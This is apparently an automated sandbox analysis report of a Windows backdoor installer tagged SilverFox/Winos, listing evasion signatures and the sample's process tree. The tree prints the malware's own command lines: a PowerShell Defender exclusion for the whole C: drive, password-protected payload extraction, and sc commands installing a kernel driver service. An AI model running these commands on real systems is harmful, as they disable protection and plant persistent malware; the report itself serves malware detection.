Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.8.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.8.exe
renamed because original name is a hash value
Original sample name:_2.0.8.exe
Analysis ID:1579795
MD5:65296edf39a492d0d9dbe2c7b6735df7
SHA1:b256b2f4f2537239b244e131c33418bbf2723b8b
SHA256:07287146cb055a3a593306fcb09d498f6b2a533f68aeb43e28ebccd2fc1c1e3f
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.8.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" MD5: 65296EDF39A492D0D9DBE2C7B6735DF7)
    • #U5b89#U88c5#U52a9#U624b_2.0.8.tmp (PID: 6504 cmdline: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 5468 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4796 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.8.exe (PID: 4984 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT MD5: 65296EDF39A492D0D9DBE2C7B6735DF7)
        • #U5b89#U88c5#U52a9#U624b_2.0.8.tmp (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 7064 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6160 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2920 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4120 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5484 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5628 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5544 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6508 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6332 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5376 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6104 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2200 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6508 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2132 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5676 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6104 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ParentProcessId: 6504, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5468, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 4120, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ParentProcessId: 6504, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5468, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 4120, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ParentProcessId: 6504, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5468, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.4% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2115894094.0000000003480000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2115992185.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C77AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C77AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00896868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00896868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00897496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00897496
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
